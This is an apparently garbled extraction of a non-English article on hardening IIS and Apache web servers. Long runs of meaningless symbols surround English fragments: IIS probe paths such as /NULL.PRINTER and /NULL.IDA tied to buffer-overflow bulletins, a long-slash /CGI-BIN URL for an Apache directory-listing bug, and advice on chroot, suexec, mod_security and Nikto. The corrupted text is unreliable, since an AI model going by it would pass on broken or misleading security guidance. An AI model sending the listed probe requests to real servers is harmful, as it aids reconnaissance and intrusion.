4% H 200 I'. 3$, 6 ( E 5< B ! ( ,H - 3 #P< I 7 ?@ " ?5F ? 7 .X … ?5 3 , " # 7 L u2 & N Y* 7 !89 6 <… < ASP 00 ) & 7 5B$ , S# 2<) ) iX ) ? GLOBAL.ASA % ' 2<) ) .ASP, `@ H U ˆ6, >G , 0, < ) d* INTERNAL ERROR;HTML ERROR IN WEB SERVER DIRECTORY PATH DISCLOSURE ,Q193689 /NULL .PRINTER .PRINTER CONTAINS BUFFER OVERFLOW ,MS01-023 PRINTER INSTALL 200 OK;HTML CONTAINS /NULL.IDA,IDP INDEX SERVER BUFFER THE IDQ FILE..COULD NOT OVERFLOW,MS01-033 BE FOUNS 200 OK;HTML THE CONTAINS FORMAT /NULL.HTW WEBHITS OF SOURCE DISCLOSURE>MS00-006 QUERY_STRING IS INVALID 200 OK (/FILE .STM MUST BE /FILE.STM ,.SHTM,.SHTM1 SERVER PRESENT) 501 NOT IMPLEMENTED SIDE INCLUDES BUFFER OVERFLOW /_VTI_BIN/_VTI_AUT/FP30REG.DLL FRONTPAGE SERVER EXTENSION BUFFER OVERFLOW,MS01-035 a+ 1-HACKING EXPOSED –WEB APPLICATION ,JOEN SCAMBRAY,MIKE SHEMA 2-WEB HACKING –ATTACKS DEFENSE,STUART MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH 3-WWW.SRCO.IR a , , < +H ) B 5/ 6 ˆ60, -,< F 2 ) ') G O) R4 S @ " 5< (E ) 6 ) ?@ n 9 " @ ) 6 2#5 N ,< " 7, , 5 $,< 62 ) #. ) 2 2 `560 < & 21 ) , LH E ) 6) B3 0 ) $ 6$ O) () R4 S @ ) < ;. NETSCAPE) IIS)APACHE? `56 R4 S @ -, 4 2 , N N %B . ) DOS1 785/ 6 ) 'G U ) 6, H @ 15G ) 5! 
0 " 0 785/ 1 , N –denial of service B3 X / T / , G1: $, < , Y -8 j * 2 5< 56 ‚, < ,< 6 N, ) ') ) - )M 6 #< TP BPH " 3 , B3 , / ? ) " # TH APACHE 0 ) 5 O) ? , 6 U ) 78# 4 $_IIS] ) %K 0 CA-2002-17,CA-2002-] =GX - 0 6 ' " 7, , - R4 S @ ? `56) < R4 S @ ^ bP ! ) h / 6- _ ?@ l '? # 4@0, < -)8!0 4@ -, 6 U ) - Y "), ) I =B* R4 S @ ^ B! ? 5 TG' g• , ] -, 6 U • 4@ 6* ? '- 9* H U# 1) U# N & )j 5• • # " R4 ) - " -, 6 U ) 4@ Z F PL $ U 6 ) 6% '2 3 , - 9* 3) -)8! 6 „ 1 # $_27 _DOS] U ) e 'j 4 7 F) & O) -, 6 U ) "$ ?@ 6* & ) 6 " 5 " ,G ) ? 4@$ " \ 2 0 5 SL & , 5 0,< 7 3 O) 7 .Y - H , ) H8! h ?8' 6 , <R 2 3 F S1H ) , 9 , ?@ APACHE 1 )„ ,< - *1 " APACHE 1 )„ 2 56) Pc 3W 3 e ' ) #17 E E 3 - *1 ORF 3 .Y ?8' ) , -,6 4@ O) -, 6 U ) & PHP)CGI R4 S @ ^ F) 7 a ') # 3W 3 # _APACHE] " 4@ , ) 6T)„ 3W 3 S @^ 2 1 ), X7: , ! X I 2 ) 7 .Y 0, , 3 , -,6 7 .Y j 5 ) / 9 y , , 6, -" F , P 4 \ X 2 # 0 ,6 H :3 e G 0 ) 6 5 ) TQ c 9 6SLASH B ) ) MOD_DIR,MOD_NEGOTIATE 1 )„ ? " ? 1 6URL 5F c 9 MOD_AUTOINDEX ? 56 . APACHE R4 S @ 2 0 ,6 j 5 2001 h APACHE 1.3.19 * A8 ) 8 1P 5 1) B " URL 0 B3 j Y0 " B " ,4 P B g O) ) - 4 GH ) , G0, 6 j 5 ?@ B ) # 5 APACHE 6 ) , 2 0, A" 1 2< ? < Y, E #0 & URL ?k7P 0 +5 , #4 B) %# 1 )„ 0 ) e 'j )$, . ' H ) , APACHE '& F) 2 %/ (, 6 ) APACHE # ) $,< , 4 B1 ˆ 60 -, @ " H APACHE ) 1 )„ 2 0, MR / # 0,6j 5 0 B 2 MOD_DIR)MOD_AUTOINDEX 47 1, , %! U 0,< +' APACHE 1.3.19 2 <+ 2#5 1) ,< 8000 " 4 ? ? ! $ B B3 PERL B 5/ 2 - " ? 5$ /CGI-BIN///////////////////////////////////////////////////S 7) Y ;! MARTIN KREAMER - '4j 4)- " ,G < 93 @ APACHE ? % , 6, j 5 ? " 3 O) ) , - Y , 1 )„ N MR/ ) 1 [ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX APACHE 2 , 60 # ', 6 3 B H" 6 Y 0, Y1* $ , ? ? ) B) - " 1Q 2 P10 3 <8 6 6 BH 2 , ,F ,< 1 2001 c F n 9 , $ APACHE 0 1 " ,< 6 3 P . ,Y (5 [ \X 1 ,6 * -,< e ! '? B , 1NETCAT 6 PASSWORD % '? 
56c / " ) F 3 B 5/ 2 0,< A & BUGTRAQ 0, < -, @ # 2 O) , " KEVINb , a,6 j 5 B APACHE)MULTIVIEWS R4 S @ ) ) X ,4 BRASSCONNON.NET " ,< 4 , -" F ?), APACHE0 $ ) " MOD-DIRT)„ MR / 2 F) 3 P 1 ,< 6) 6 \ 2 B' R4 S @ 2 0,< 0,6 MULTIVIEW ' ? B - , P - ) X g B'0, - N`6 , P$, < V4 ?) 2 O) ? , 6 G 5 # " H) 6 2 \' 21 ) 0 < - 3• B' 6)$ ? 1 0,< ?P 4 * $ 5 ,H R 4 S @0,< < F) @ ?) 6 % H 6 ) B) , ,, h / 6- MOD_AUTH_*SQL l T <) STUTTGART- N ?) _¤] 7 , 2 P 10, < 0 iX SQL -" F ? " RUS-CERT,2001 1 )„ 4 2 56) < 6" / ?@ 2 0 - 6 3 ;. %LY 6" / N N R N F O) , " 9 -, @ 3 P 10, ") 0, , \X APACHE , !" U) R4 S @ d * - . W L3 a - Y 2 " U4 0 + &'( )3 45 678 ("c 7 !89 S ) 6h @ " ? $ " $ %6 MOD_AUTH_*SQL - Y ", - - ) 6 @ I5 4@ O) -, 6 APACHE 1.3.X h @" ? SQL P< MOD_AUTH_*SQL • ("c @ • : HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13 h @" ? APACHE 2.0.X HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20 ) R4 S @ d * " - Y 0, <P 0 ,Y - . I 5 ("c '7 !89 G X) Z W K a 6h @ ("c 7 4 & HTTP://HTTPD.APACHE.ORG/a h @ "2 APACHE O) -, 6 U ) 0 L3 $-,< - < "7 K 4$ "7 " 4@ O) -, 6 U ) 4$ DY/ B <) DY/ I 5 4@ O) 2 3@ SL " ? 59…w HTTP://HTTPD.APACHE.ORG/h @ " ? 5 - Y levels PATCH) 6 * h @" ? 4@ : GX) 2 3@ " 2 6@ Q CODE SOURCE 6* … I5 I … 0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/ ? @ " +F ? ! . I 4@ % ! ) X - < R4 S @ ^ 1 )„ C' # 2 " $ . - "2 % 5 0, 5 6-" $ -, 6 U ) O F$ 4 0 ? G “/“ - Y G', % ' 5 -,6 6 c H, ), . $ l ' ( : ?@ ), . -)8!0 0, @ # 0 5 ?@ '# ,6 * 6U ) H CHROOT/HTTPD| 0 LOGIN SESSION " 5 ) ?# $, 5 " g@ 3 6- Y Z 6- Y # 6 ' ) -, < -, F W L3 $l ' 3 6j* G', c 2#5 $ ) -,< -, 3 'SHELL ", 8Q0, C L 3 'SHELL 15 / - Y Z E /CHROOT 1G') Z F CHROOTED 7 S 2#5 $ $ , 6 F W L3 4@ F) CHROOT " z 3 ) % ! 15 / F 3 < 4@ -, 6 U ) F CHROOT b . 8Q0 C ) F & 7 I ) G ; ! CHROOT CHROOT0 5< l '-) B 4$ CHROOT…‹ ,E = ,4 2 W 3 ^ P> F ) ROOT ? G, F " …s E " E %H ,/ W 3 6) - ),. ,E = G ;! ) #B 5! 4@ 0 < ,6 * / 0 - Y - 5 - Y _CA-2002-23] OPENSSL ) , ) X 4@ 2 5 MOD_SSL(CA-2002-27) ( % I 2, F ("c : ("c0, 0 ) !PATCHING " ? 
59…p ,B F S 4@ 2, 0 < ,6 * 5 ? G0 5 ? G0 H CHROOT E E 15 / /BIN/SKY 4@ CHROOTING ) !89 , " ?@ I5 <& $ CGI,PHP 6 6U) ,G +P - ^ P 6 A) 0,< < TP, &'( 7, 3 ?@ # P ) "E 6 ,' 1G'\ 6% 6 •c 4) 6 S , ?# $ S !89 , ) BH$ @ R3 4@ -, 6 U ) 0 '#< ) [ 6 '$ -, 6 U ) < $ , 5 ' K LOGGING 0, 5 (E 2, 0 < I 5 …Š ) -, 6 U ) ("c 2 40 6% ' + K W L3 ?# " W 3 I ) 1 )„ F) CHROOTING < B K LOGGING 7 B 5! g * ("c 7 , 5 ? @ &1 R 4 M :G H 9P ("c$ O) -, 6 U ) 2#5 F %K W L3 I 6 #6 -, 6 U ) W L3 c ("c P F7 [ , b. F 3 - Y $ 9 1G'W L3 ("c 0, 5 B : I 5 O) -, 6 U ) ? G$ I ) # 2 : 6% ' 7 L g ' ) F 7 !89 a,< ,6 3 6 '? @ a 5 - Y "+ " , •c 7) Y h @ " APACHE 6 ' ) <@ I5 1.3.X … < HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML APACHE HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X - Y 0 < •c P ) F 6% ' . 2#5 -, @ j 4 ^ < ) CGI,PHP " 6 „ 1# &1@ ? j &' I 5 ? •c0 5 POST,GET ^ MOD_SECURITY n 9 " , 6•c F # ) ) )Y l ' GX)0,<P ' ,, $ - Y # P [ ( ,H $ =GX " - Y Z POST ) GET bP 7 B 5! ? 5 0 R4 7 _DETECTIOMN INTRUDER] 2 5/& d * l' 0, 5 N 4 K F O) S W L3 j< 4 " $MODSECURITY0, 5 U) MODSECURITY ) ("c 6 < 6 'O) N 4 ) ,< O) -, 6 U ) 6 ^P - 56 F 0, 5 5/ " 4@ -, 6 -HTTP://WWW.MODSECURITY.ORG/ •-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12 6 ) SSI,CGI,PHP…• # a ,F ) X # N ], K5 TG' g 4 # I ,! T G' g 2 < F) ? @ : SERVER SIDE INCLUDES ", 3 : ) SSI,CGI,PHP… 6? " _,< Z " 6, F ;! ) , 6 '-, 6 U ) SSI… " - Y 0, K5 ) SSI,CGI,PHP " # 6? " # F ? # $SUEXEC0 < - Y SUEXEC " 6 ' APACHE USER ID H ^ , 5 6 ' USER ID , 6 3 MR /$ ? 5F 7 7, , S b , < ("c j SETUPID ROOT , 4@ . . CGI)SSI L 3 CGI)SSI ) 6 @ 3 <) S SUEXEC " - Y ) / 0, 5 6 F 3 ' 6 F) , # 4 (,! #B 5! - . ) 6- Y/ ") <@ - Y ;! I ) : a 5 - Y a < - Y 6 SUEXEC " -,Y 0, < ( 0,< ,6 3 N h @" ? - Y 2 , 0, < O ) -, 6 U ) -, < < P - 5 ?# 2 SUEXEC 4@ ? … $ USER ID % P 7) Y USER ID 2 < ? # ) j6 ) X # " h @ " APACHE 1.3.X 3 2 " 6 … HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML a < " h @ " APACHE 2.0.X - Y … HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML ) CGI-BIN % < , MR/$ 5 e 'j 4 6 . 
W L3 # 5 ("c … ("c ) ( E 6 # PHP " ) - z 3 1 2 B / " S1: a 0 HTTP HEADER F - < W L3 2 7 !89 K ;! SAFE 1/ h @ " ? W l '\ X L3 2 23 5 ) K6 PHP 25 4 C ' 4 ? 5 TG' g… F " ? 59 T L/… B5# 7 !89 ' HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706 T)„ 8Q 0 G X) XSS:CROSS SITE " ? W L3 2 P % I 'X ) … MOD_SECURITY DY/ ; ! , B5# 7 !89 -,6 1 )„ " - Y 0 < SCRIPTING <@ 0 5 - Y HTTP://MODSECURITY.ORG/ h @ SQL INJECTION &XSS % < R 4 S @ ^ ( 0 5 - Y h @ 2 P h ,G 6 6 & " ? : ) &5 … 0 56 &K/ & H]NIKTO & % " 2 # ' # _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML 0 CGI ) j 4 6& V' ] >#